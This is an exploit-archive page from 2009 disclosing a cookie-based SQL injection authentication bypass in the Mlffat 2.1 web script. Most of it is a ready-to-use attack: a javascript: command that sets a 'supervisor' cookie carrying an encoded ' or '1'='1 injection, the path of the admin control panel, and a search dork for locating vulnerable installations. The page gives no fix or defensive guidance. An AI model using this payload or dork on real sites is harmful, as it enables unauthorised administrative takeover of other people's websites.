[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Mlffat 2.1 (Auth Bypass / Cookie) SQL Injection Vulnerability
# Published : 2009-05-13
# Author : Qabandi
# Previous Title : MaxCMS 2.0 (m_username) Arbitrary Create Admin Exploit
# Next Title : Bitweaver <= 2.6 saveFeed() Remote Code Execution Exploit
|| || | ||
o_,_7 _|| . _o_7 _|| q_|_|| o_w_,
( : / (_) / ( .
######################################################
# MLFFAT 2.1 - insecure Cookie Handling
#
######################################################
# Qabandi | iqa[a]hotmail.fr
From Kuwait, Peace.
Salamz: Killer Hack, Ghost-R00t, Mr.Mn7os, all Muslims
######################################################
Buy: http://mlffat.com/emm/index.php?action=order
Dork: "Powered by mlffat"
------------------------------------------------------
-:PoC:-
javascript:document.cookie = "supervisor=OmFkbWluJyBvciAnMSc9JzE6MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM="
AdminCP: ./cpanel/index.php
----------> La tsta3mluha 3la al mowaqi3 el islamiya <-------------
# www.Syue.com [2009-05-13]